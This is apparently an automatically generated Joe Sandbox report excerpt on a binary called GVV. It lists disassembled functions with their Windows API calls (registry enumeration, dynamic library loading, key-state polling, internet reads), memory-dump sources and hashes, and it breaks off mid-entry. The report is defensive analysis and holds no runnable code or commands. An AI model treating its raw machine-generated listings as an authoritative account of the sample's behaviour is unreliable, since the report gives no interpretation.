                Uniqueness Score: -1.00%

                Function 0019B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BAA5
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019BB00
                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0019BB63
                • RegCloseKey.ADVAPI32(?,?), ref: 0019BBA6
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BBB3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                • String ID:
                • API String ID: 826366716-0
                • Opcode ID: 4b85d8fced51de4af793dfbf3c93125021d1c3ed2de0939e5c95b756e3ed5b67
                • Instruction ID: 6bc405c74f12cccfcd4d696a35af43dd3e59ae2fe6ab5123816654408287d77d
                • Opcode Fuzzy Hash: 4b85d8fced51de4af793dfbf3c93125021d1c3ed2de0939e5c95b756e3ed5b67
                • Instruction Fuzzy Hash: 2E61A131208241AFD718DF14D5D0E6ABBE5FF84308F54856CF49A8B2A2DB31ED85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00178BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 00178BCD
                • VariantClear.OLEAUT32 ref: 00178C3E
                • VariantClear.OLEAUT32 ref: 00178C9D
                • VariantClear.OLEAUT32(?), ref: 00178D10
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00178D3B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$Clear$ChangeInitType
                • String ID:
                • API String ID: 4136290138-0
                • Opcode ID: d709864343c1ce38dda7e7d63e60ad1a144c639499e4a56c88177a003f892423
                • Instruction ID: fbaafb8666ca04716ea70881d578bda79fe6898c9fd58e2546f6c9e79c7f5a6a
                • Opcode Fuzzy Hash: d709864343c1ce38dda7e7d63e60ad1a144c639499e4a56c88177a003f892423
                • Instruction Fuzzy Hash: BD5149B5A00619EFCB14CF68C894AAAB7F9FF8D314B158559E909DB350E730E911CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00188AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                Download Yara Rule
                APIs
                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00188BAE
                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00188BDA
                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00188C32
                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00188C57
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00188C5F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: PrivateProfile$SectionWrite$String
                • String ID:
                • API String ID: 2832842796-0
                • Opcode ID: 0977e6811dcaea2e6350f413612181f301fe23656617cdffada90f92836f33cd
                • Instruction ID: 5084ae3a77622c228d9f022aeb318074908c26ed813e23acdcf669e617373988
                • Opcode Fuzzy Hash: 0977e6811dcaea2e6350f413612181f301fe23656617cdffada90f92836f33cd
                • Instruction Fuzzy Hash: 9B514F35A002159FCB05DF64C881AADBBF5FF49314F088469E849AB3A2DB31ED51CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00198EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00198F40
                • GetProcAddress.KERNEL32(00000000,?), ref: 00198FD0
                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00198FEC
                • GetProcAddress.KERNEL32(00000000,?), ref: 00199032
                • FreeLibrary.KERNEL32(00000000), ref: 00199052
                  • Part of subcall function 0012F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00181043,?,7644E610), ref: 0012F6E6
                  • Part of subcall function 0012F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0016FA64,00000000,00000000,?,?,00181043,?,7644E610,?,0016FA64), ref: 0012F70D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                • String ID:
                • API String ID: 666041331-0
                • Opcode ID: d8023cec3d193c260257fb6c956c2fe75fbf160226130cd7fb68c5530fef5c46
                • Instruction ID: 207e1cb31a6a1402112e723ea1c0512f723baee943e99d33cbcc3c81ca4c1748
                • Opcode Fuzzy Hash: d8023cec3d193c260257fb6c956c2fe75fbf160226130cd7fb68c5530fef5c46
                • Instruction Fuzzy Hash: 23515A34604205DFCB15DF68C4949ADBBF1FF5A314F0980A8E81A9B362DB31ED86CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001A6C33
                • SetWindowLongW.USER32(?,000000EC,?), ref: 001A6C4A
                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001A6C73
                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0018AB79,00000000,00000000), ref: 001A6C98
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001A6CC7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long$MessageSendShow
                • String ID:
                • API String ID: 3688381893-0
                • Opcode ID: 0710f663e266289a01f38d935de1ba5efd14020e89c20a5d2742c8d58f6619de
                • Instruction ID: 9401b0a6f2dbb533c61b1602ef4d1b7d3322c8831d4c754ef9619fe2e05346c4
                • Opcode Fuzzy Hash: 0710f663e266289a01f38d935de1ba5efd14020e89c20a5d2742c8d58f6619de
                • Instruction Fuzzy Hash: 0441C339A04104AFD724DF68CC58FA97BA5EB0B370F190228F899A72E5C771ED41DA90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00142051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 09b16b00de926033f2159519bd0d8702e27c513b85d970aeda2b445da6ccf64c
                • Instruction ID: cf1b5b6bba9ba27853b0a2fb7d2820e68ee4f27c6796f378dafbd2a90191fb12
                • Opcode Fuzzy Hash: 09b16b00de926033f2159519bd0d8702e27c513b85d970aeda2b445da6ccf64c
                • Instruction Fuzzy Hash: 58410332A002009FCB24DF78C880A5EB7F5EF89714F5645A9F615EB3A6DB71AD41CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 00129141
                • ScreenToClient.USER32(00000000,?), ref: 0012915E
                • GetAsyncKeyState.USER32(00000001), ref: 00129183
                • GetAsyncKeyState.USER32(00000002), ref: 0012919D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AsyncState$ClientCursorScreen
                • String ID:
                • API String ID: 4210589936-0
                • Opcode ID: 3c6a0c31a9d0934a3b6a00ad1cb7258f62b7242186a549774906c56997f60200
                • Instruction ID: 607314dec3112b890e866ef6a241975a4418cea0f1ebf1fb931f63bd866e529a
                • Opcode Fuzzy Hash: 3c6a0c31a9d0934a3b6a00ad1cb7258f62b7242186a549774906c56997f60200
                • Instruction Fuzzy Hash: 80414071A0861ABBDF199F69DC44BEEB774FB16334F208216E429A72D0C7345960CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00183874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                • GetInputState.USER32 ref: 001838CB
                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00183922
                • TranslateMessage.USER32(?), ref: 0018394B
                • DispatchMessageW.USER32(?), ref: 00183955
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00183966
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                • String ID:
                • API String ID: 2256411358-0
                • Opcode ID: bf57bb15de947d919a3d6c60eb40452b1ad50387d060216e7f6f3a99f5e7f783
                • Instruction ID: 6f8af859616af53156ff7863abb4f5789fa498b2b8e8bd353c6c08127960d96c
                • Opcode Fuzzy Hash: bf57bb15de947d919a3d6c60eb40452b1ad50387d060216e7f6f3a99f5e7f783
                • Instruction Fuzzy Hash: 8231A670D04381AEEB35EB74D848BBA37A8AB16B08F0C056DE476865A0E7B497C5CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                Download Yara Rule
                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0018CF38
                • InternetReadFile.WININET(?,00000000,?,?), ref: 0018CF6F
                • GetLastError.KERNEL32(?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFB4
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFC8
                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0018C21E,00000000), ref: 0018CFF2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 3191363074-0
                • Opcode ID: bf4c0cf554cbeb0cc1d5fe62ce6a7eab1381eb6ab8fd420463592ac37cd627cd
                • Instruction ID: 020e36c2fb1733599969d5396e01073bb054b3aba009ff140f07a2981e20cbe8
                • Opcode Fuzzy Hash: bf4c0cf554cbeb0cc1d5fe62ce6a7eab1381eb6ab8fd420463592ac37cd627cd
                • Instruction Fuzzy Hash: 47315C71604205EFEB24EFA5D884AABBBFAEF15354B10442EF616D2540DB30AE41DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 00171915
                • PostMessageW.USER32(00000001,00000201,00000001), ref: 001719C1
                • Sleep.KERNEL32(00000000,?,?,?), ref: 001719C9
                • PostMessageW.USER32(00000001,00000202,00000000), ref: 001719DA
                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001719E2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePostSleep$RectWindow
                • String ID:
                • API String ID: 3382505437-0
                • Opcode ID: f705148fbb14b2e1d0ee0d0d26b30f39ec8a4b6031a4d05e0d80b6e07db8e57a
                • Instruction ID: d2326f3d98b794c1c3cdcafa0208fa60ab91e243f52d63b196ae7f395c47dff4
                • Opcode Fuzzy Hash: f705148fbb14b2e1d0ee0d0d26b30f39ec8a4b6031a4d05e0d80b6e07db8e57a
                • Instruction Fuzzy Hash: 4331B171A00219EFCB14CFACCD99ADE3BB5EB45319F108225FA25A72D1C7709945CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001A5745
                • SendMessageW.USER32(?,00001074,?,00000001), ref: 001A579D
                • _wcslen.LIBCMT ref: 001A57AF
                • _wcslen.LIBCMT ref: 001A57BA
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A5816
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$_wcslen
                • String ID:
                • API String ID: 763830540-0
                • Opcode ID: 79f988bc7191b8ac11c4ef3700ac83f5e86b6be119b33e26275b1ef01ee6a174
                • Instruction ID: 5ecaa441cfd59ad331edd5e9dbeb67385f1003f6cd987a621441a15603ce5837
                • Opcode Fuzzy Hash: 79f988bc7191b8ac11c4ef3700ac83f5e86b6be119b33e26275b1ef01ee6a174
                • Instruction Fuzzy Hash: 58219979908618DADB20DFA0CC85AEE7779FF16724F504116F919EB1C0E7709985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00190930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • IsWindow.USER32(00000000), ref: 00190951
                • GetForegroundWindow.USER32 ref: 00190968
                • GetDC.USER32(00000000), ref: 001909A4
                • GetPixel.GDI32(00000000,?,00000003), ref: 001909B0
                • ReleaseDC.USER32(00000000,00000003), ref: 001909E8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ForegroundPixelRelease
                • String ID:
                • API String ID: 4156661090-0
                • Opcode ID: 422428576dcd9bc099d39b70b7631f663a7f344264108178b2955e4a1320b1de
                • Instruction ID: ce7c223f3b8de25d00eb98c5281f67b275a0d317b149b228d90e252c6250d422
                • Opcode Fuzzy Hash: 422428576dcd9bc099d39b70b7631f663a7f344264108178b2955e4a1320b1de
                • Instruction Fuzzy Hash: 3C218136600204AFD704EF65DD84AAEBBE9EF59704F048468E84AE7752DB30AD44CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0014CDC6
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014CDE9
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0014CE0F
                • _free.LIBCMT ref: 0014CE22
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014CE31
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 79b906b098c46af5ec734431a63f53952745bce8152ad22e124d288a42503d66
                • Instruction ID: 58d57a7dad6a72853cbb4f1f5e9bb0f6f585c25936212b76d8c1930e145fe856
                • Opcode Fuzzy Hash: 79b906b098c46af5ec734431a63f53952745bce8152ad22e124d288a42503d66
                • Instruction Fuzzy Hash: 920144726036157F276117BA6C88D7B6D6DEFC7BA13150129F905E7221EF618D0291F0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00129639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                Download Yara Rule
                APIs
                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                • SelectObject.GDI32(?,00000000), ref: 001296A2
                • BeginPath.GDI32(?), ref: 001296B9
                • SelectObject.GDI32(?,00000000), ref: 001296E2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ObjectSelect$BeginCreatePath
                • String ID:
                • API String ID: 3225163088-0
                • Opcode ID: 5419427c8b2fb382f7fbd7f0f2d4d9bbb08cec1c13c16e0052bd395a04db1e33
                • Instruction ID: 966a024a15b9f57f682644204a42f88436ba929bd5c5f052a9df45afeda75b94
                • Opcode Fuzzy Hash: 5419427c8b2fb382f7fbd7f0f2d4d9bbb08cec1c13c16e0052bd395a04db1e33
                • Instruction Fuzzy Hash: AB219270902395FFDB119FA8FC48BAD3BA9BB11319F100216F410AA5B2D37458E5CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00175711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: a2f83e33edc7a12a1e51ca6909d19bb54581737c18a12063fbea658730938ce8
                • Instruction ID: 1d745015e35dd83a50eeb76f63d7f97ebe183106621f396a0199618396a8c375
                • Opcode Fuzzy Hash: a2f83e33edc7a12a1e51ca6909d19bb54581737c18a12063fbea658730938ce8
                • Instruction Fuzzy Hash: CC0152A5641609BAE30C55119D83FBA736EAB613A5F848025FD089A642F7B1ED1182B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00142DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,0013F2DE,00143863,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6), ref: 00142DFD
                • _free.LIBCMT ref: 00142E32
                • _free.LIBCMT ref: 00142E59
                • SetLastError.KERNEL32(00000000,00111129), ref: 00142E66
                • SetLastError.KERNEL32(00000000,00111129), ref: 00142E6F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 96e1a80df21504a76176d312dee897a805c312c93fed532e7b2560255326d25d
                • Instruction ID: 8a0846a6462d0d901cff0730eb942cb036763c9cb9408525fe09b4a3e810078f
                • Opcode Fuzzy Hash: 96e1a80df21504a76176d312dee897a805c312c93fed532e7b2560255326d25d
                • Instruction Fuzzy Hash: F401F432206A0167CA2267756C85D2F266AAFE23B5BE50529F425F22B2EF70CCC18160
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                Download Yara Rule
                APIs
